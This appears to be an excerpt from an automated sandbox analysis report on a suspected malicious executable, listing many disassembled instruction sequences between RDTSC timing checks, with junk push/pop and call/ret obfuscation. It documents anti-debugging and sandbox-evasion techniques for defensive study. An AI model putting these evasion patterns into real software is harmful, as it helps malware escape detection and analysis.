Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10CB1B5 second address: 10CB264 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F12C15B7329h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c mov ebx, 104A61C1h 0x00000011 xor ebx, dword ptr [ebp+122D1EB1h] 0x00000017 push dword ptr fs:[00000000h] 0x0000001e push 00000000h 0x00000020 push edx 0x00000021 call 00007F12C15B7318h 0x00000026 pop edx 0x00000027 mov dword ptr [esp+04h], edx 0x0000002b add dword ptr [esp+04h], 0000001Bh 0x00000033 inc edx 0x00000034 push edx 0x00000035 ret 0x00000036 pop edx 0x00000037 ret 0x00000038 mov dword ptr fs:[00000000h], esp 0x0000003f push 00000000h 0x00000041 push ebp 0x00000042 call 00007F12C15B7318h 0x00000047 pop ebp 0x00000048 mov dword ptr [esp+04h], ebp 0x0000004c add dword ptr [esp+04h], 00000014h 0x00000054 inc ebp 0x00000055 push ebp 0x00000056 ret 0x00000057 pop ebp 0x00000058 ret 0x00000059 and edi, 3B7C5A09h 0x0000005f mov eax, dword ptr [ebp+122D0D4Dh] 0x00000065 jmp 00007F12C15B7326h 0x0000006a mov bh, dl 0x0000006c push FFFFFFFFh 0x0000006e xor dword ptr [ebp+1244DB13h], ebx 0x00000074 nop 0x00000075 push eax 0x00000076 push edx 0x00000077 js 00007F12C15B7318h 0x0000007d push esi 0x0000007e pop esi 0x0000007f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10CA20B second address: 10CA21E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F12C08324C6h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d jne 00007F12C08324C6h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10CC171 second address: 10CC177 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10C7F90 second address: 10C7FB2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F12C08324D7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ecx 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push edi 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10CDF08 second address: 10CDF0F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10CD1EE second address: 10CD1F5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10CC177 second address: 10CC221 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push esi 0x0000000a jmp 00007F12C15B7325h 0x0000000f pop esi 0x00000010 nop 0x00000011 push 00000000h 0x00000013 push edx 0x00000014 call 00007F12C15B7318h 0x00000019 pop edx 0x0000001a mov dword ptr [esp+04h], edx 0x0000001e add dword ptr [esp+04h], 0000001Bh 0x00000026 inc edx 0x00000027 push edx 0x00000028 ret 0x00000029 pop edx 0x0000002a ret 0x0000002b mov ebx, dword ptr [ebp+122D1CF0h] 0x00000031 mov dword ptr [ebp+1244DB13h], edi 0x00000037 push dword ptr fs:[00000000h] 0x0000003e mov edi, 66AE1CC4h 0x00000043 mov dword ptr fs:[00000000h], esp 0x0000004a movsx ebx, di 0x0000004d mov eax, dword ptr [ebp+122D0B4Dh] 0x00000053 sbb edi, 15563160h 0x00000059 push FFFFFFFFh 0x0000005b mov bx, si 0x0000005e sub edi, 202FE154h 0x00000064 nop 0x00000065 pushad 0x00000066 jmp 00007F12C15B7322h 0x0000006b push eax 0x0000006c push edx 0x0000006d jmp 00007F12C15B7327h 0x00000072 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10C7FB2 second address: 10C7FB7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10C80BA second address: 10C80D8 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F12C15B7326h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10CFE84 second address: 10CFE8A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10CFE8A second address: 10CFF17 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F12C15B731Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], eax 0x0000000e mov edi, 3BB1B057h 0x00000013 push 00000000h 0x00000015 push 00000000h 0x00000017 push eax 0x00000018 call 00007F12C15B7318h 0x0000001d pop eax 0x0000001e mov dword ptr [esp+04h], eax 0x00000022 add dword ptr [esp+04h], 0000001Ah 0x0000002a inc eax 0x0000002b push eax 0x0000002c ret 0x0000002d pop eax 0x0000002e ret 0x0000002f jg 00007F12C15B731Ch 0x00000035 mov bx, A01Fh 0x00000039 mov ebx, dword ptr [ebp+1245E4F4h] 0x0000003f push 00000000h 0x00000041 push 00000000h 0x00000043 push edx 0x00000044 call 00007F12C15B7318h 0x00000049 pop edx 0x0000004a mov dword ptr [esp+04h], edx 0x0000004e add dword ptr [esp+04h], 0000001Ah 0x00000056 inc edx 0x00000057 push edx 0x00000058 ret 0x00000059 pop edx 0x0000005a ret 0x0000005b push eax 0x0000005c pushad 0x0000005d jmp 00007F12C15B731Eh 0x00000062 pushad 0x00000063 push eax 0x00000064 push edx 0x00000065 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10D1EE8 second address: 10D1EF8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a jg 00007F12C08324C6h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10D1EF8 second address: 10D1EFC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10D11AD second address: 10D11B3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10D11B3 second address: 10D11B8 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10D2036 second address: 10D20ED instructions: 0x00000000 rdtsc 0x00000002 jno 00007F12C08324C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007F12C08324D4h 0x0000000f popad 0x00000010 push eax 0x00000011 ja 00007F12C08324DCh 0x00000017 nop 0x00000018 mov di, ax 0x0000001b push dword ptr fs:[00000000h] 0x00000022 push 00000000h 0x00000024 push ebp 0x00000025 call 00007F12C08324C8h 0x0000002a pop ebp 0x0000002b mov dword ptr [esp+04h], ebp 0x0000002f add dword ptr [esp+04h], 00000017h 0x00000037 inc ebp 0x00000038 push ebp 0x00000039 ret 0x0000003a pop ebp 0x0000003b ret 0x0000003c mov bx, 20A8h 0x00000040 mov dword ptr fs:[00000000h], esp 0x00000047 movsx edi, bx 0x0000004a mov bx, DBF8h 0x0000004e mov eax, dword ptr [ebp+122D0C19h] 0x00000054 mov dword ptr [ebp+122D3653h], ecx 0x0000005a mov bl, 34h 0x0000005c push FFFFFFFFh 0x0000005e movzx edi, si 0x00000061 nop 0x00000062 jns 00007F12C08324CEh 0x00000068 push eax 0x00000069 push eax 0x0000006a push edx 0x0000006b push eax 0x0000006c push edx 0x0000006d jmp 00007F12C08324D8h 0x00000072 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10D20ED second address: 10D20F7 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F12C15B7316h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10D310F second address: 10D3114 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10D3114 second address: 10D31C4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F12C15B7325h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push 00000000h 0x0000000c push edx 0x0000000d call 00007F12C15B7318h 0x00000012 pop edx 0x00000013 mov dword ptr [esp+04h], edx 0x00000017 add dword ptr [esp+04h], 00000016h 0x0000001f inc edx 0x00000020 push edx 0x00000021 ret 0x00000022 pop edx 0x00000023 ret 0x00000024 jmp 00007F12C15B731Fh 0x00000029 push dword ptr fs:[00000000h] 0x00000030 push 00000000h 0x00000032 push edi 0x00000033 call 00007F12C15B7318h 0x00000038 pop edi 0x00000039 mov dword ptr [esp+04h], edi 0x0000003d add dword ptr [esp+04h], 00000018h 0x00000045 inc edi 0x00000046 push edi 0x00000047 ret 0x00000048 pop edi 0x00000049 ret 0x0000004a sub dword ptr [ebp+122D1D0Ch], ecx 0x00000050 mov ebx, dword ptr [ebp+122D1DAAh] 0x00000056 mov dword ptr fs:[00000000h], esp 0x0000005d mov dword ptr [ebp+1244D86Dh], ebx 0x00000063 mov eax, dword ptr [ebp+122D114Dh] 0x00000069 jl 00007F12C15B731Ch 0x0000006f mov dword ptr [ebp+12478EBDh], edi 0x00000075 push FFFFFFFFh 0x00000077 sub dword ptr [ebp+12449B9Eh], ebx 0x0000007d nop 0x0000007e push eax 0x0000007f push edx 0x00000080 jp 00007F12C15B731Ch 0x00000086 jg 00007F12C15B7316h 0x0000008c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10D8050 second address: 10D8070 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F12C08324C6h 0x0000000a popad 0x0000000b pushad 0x0000000c jmp 00007F12C08324D2h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10E092C second address: 10E0931 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10E0A8A second address: 10E0A90 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10E0A90 second address: 10E0A96 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10E0A96 second address: 10E0AA6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 jnl 00007F12C08324C6h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10E4F44 second address: 10E4F4A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10E7F3B second address: 10E7F3F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10E7F3F second address: 10E7F43 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10E7F43 second address: 10E7F49 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10E7F49 second address: 10E7F82 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F12C15B7327h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [eax] 0x0000000b push edi 0x0000000c jmp 00007F12C15B731Ch 0x00000011 pop edi 0x00000012 mov dword ptr [esp+04h], eax 0x00000016 push eax 0x00000017 push edx 0x00000018 je 00007F12C15B731Ch 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10E7F82 second address: 10E7F86 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10E7F86 second address: 10E7F8C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10E7F8C second address: 10E7F90 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10E8136 second address: 10E8140 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10E8140 second address: 10E8156 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jnc 00007F12C08324CCh 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10E8156 second address: 10E8167 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F12C15B731Dh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10E8167 second address: 10E816B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10E816B second address: 10E8181 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esp+04h] 0x0000000c push eax 0x0000000d push edx 0x0000000e jne 00007F12C15B7318h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10E8285 second address: 10E82D4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F12C08324CFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebx 0x0000000a push eax 0x0000000b push edi 0x0000000c jmp 00007F12C08324D7h 0x00000011 pop edi 0x00000012 mov eax, dword ptr [esp+04h] 0x00000016 push edi 0x00000017 jmp 00007F12C08324CFh 0x0000001c pop edi 0x0000001d mov eax, dword ptr [eax] 0x0000001f pushad 0x00000020 pushad 0x00000021 jno 00007F12C08324C6h 0x00000027 push eax 0x00000028 push edx 0x00000029 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10E82D4 second address: F0EFC4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 ja 00007F12C15B731Ch 0x0000000b popad 0x0000000c mov dword ptr [esp+04h], eax 0x00000010 jmp 00007F12C15B731Dh 0x00000015 pop eax 0x00000016 pushad 0x00000017 mov dx, di 0x0000001a popad 0x0000001b push dword ptr [ebp+122D01E1h] 0x00000021 pushad 0x00000022 jp 00007F12C15B7318h 0x00000028 push ecx 0x00000029 pop esi 0x0000002a popad 0x0000002b call dword ptr [ebp+122D1DCFh] 0x00000031 pushad 0x00000032 add dword ptr [ebp+122D31A4h], ebx 0x00000038 xor eax, eax 0x0000003a xor dword ptr [ebp+122D31A4h], ebx 0x00000040 mov edx, dword ptr [esp+28h] 0x00000044 xor dword ptr [ebp+122D31A4h], ebx 0x0000004a mov dword ptr [ebp+122D3C55h], eax 0x00000050 mov dword ptr [ebp+122D1D49h], eax 0x00000056 mov esi, 0000003Ch 0x0000005b mov dword ptr [ebp+122D1D49h], edi 0x00000061 add esi, dword ptr [esp+24h] 0x00000065 sub dword ptr [ebp+122D31A4h], eax 0x0000006b lodsw 0x0000006d pushad 0x0000006e mov dword ptr [ebp+122D31A4h], ecx 0x00000074 mov bx, F570h 0x00000078 popad 0x00000079 add eax, dword ptr [esp+24h] 0x0000007d jbe 00007F12C15B7317h 0x00000083 cld 0x00000084 jno 00007F12C15B731Dh 0x0000008a mov ebx, dword ptr [esp+24h] 0x0000008e mov dword ptr [ebp+122D1C96h], eax 0x00000094 push eax 0x00000095 push eax 0x00000096 push edx 0x00000097 jmp 00007F12C15B7325h 0x0000009c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1080F31 second address: 1080F40 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push edi 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 pop edi 0x00000009 pop ebx 0x0000000a push esi 0x0000000b push eax 0x0000000c push edx 0x0000000d push esi 0x0000000e pop esi 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1080F40 second address: 1080F44 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10ED4C0 second address: 10ED4DB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F12C08324CDh 0x0000000d push eax 0x0000000e push edx 0x0000000f push edx 0x00000010 pop edx 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10ED4DB second address: 10ED4E3 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10ED4E3 second address: 10ED4FE instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jmp 00007F12C08324D6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10EDCF3 second address: 10EDD2C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F12C15B7322h 0x0000000b popad 0x0000000c push ebx 0x0000000d jnp 00007F12C15B7316h 0x00000013 pop ebx 0x00000014 push eax 0x00000015 jnl 00007F12C15B7316h 0x0000001b pushad 0x0000001c popad 0x0000001d pop eax 0x0000001e popad 0x0000001f pushad 0x00000020 jne 00007F12C15B7318h 0x00000026 push eax 0x00000027 pop eax 0x00000028 push eax 0x00000029 push edx 0x0000002a push ebx 0x0000002b pop ebx 0x0000002c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10F32E5 second address: 10F32EB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10F32EB second address: 10F32F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F12C15B7316h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10F3440 second address: 10F3461 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pushad 0x00000007 jmp 00007F12C08324D8h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10F3461 second address: 10F347F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F12C15B7328h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10F35A5 second address: 10F35B1 instructions: 0x00000000 rdtsc 0x00000002 js 00007F12C08324CEh 0x00000008 push edx 0x00000009 pop edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10F38B0 second address: 10F38B8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10F38B8 second address: 10F38BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10F38BC second address: 10F38DE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F12C15B7329h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ecx 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10F2F9D second address: 10F2FA3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10F2FA3 second address: 10F2FA9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10F3D1A second address: 10F3D42 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F12C08324CBh 0x0000000f jmp 00007F12C08324D3h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10F3D42 second address: 10F3D61 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F12C15B7325h 0x00000009 jc 00007F12C15B7316h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10F4350 second address: 10F4354 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10FDAA1 second address: 10FDAA8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10FC6A1 second address: 10FC6AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pushad 0x00000006 popad 0x00000007 pop ebx 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10FC6AF second address: 10FC6B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10FC6B3 second address: 10FC6B7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10FCDCC second address: 10FCE08 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F12C15B7328h 0x00000007 pushad 0x00000008 jmp 00007F12C15B7329h 0x0000000d jne 00007F12C15B7316h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10FCF7F second address: 10FCF89 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10FCF89 second address: 10FCF8F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10FCF8F second address: 10FCF93 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10FD0C9 second address: 10FD0F4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jbe 00007F12C15B7316h 0x0000000b jmp 00007F12C15B7328h 0x00000010 popad 0x00000011 pop edx 0x00000012 pop eax 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10FD0F4 second address: 10FD0FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 push eax 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10FD0FE second address: 10FD103 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10FD103 second address: 10FD10C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10FD10C second address: 10FD112 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10FD217 second address: 10FD226 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F12C08324CBh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10FD226 second address: 10FD22C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10FD22C second address: 10FD249 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F12C08324D9h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10FD50E second address: 10FD513 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 109F23F second address: 109F24A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F12C08324C6h 0x0000000a pop eax 0x0000000b rdtsc
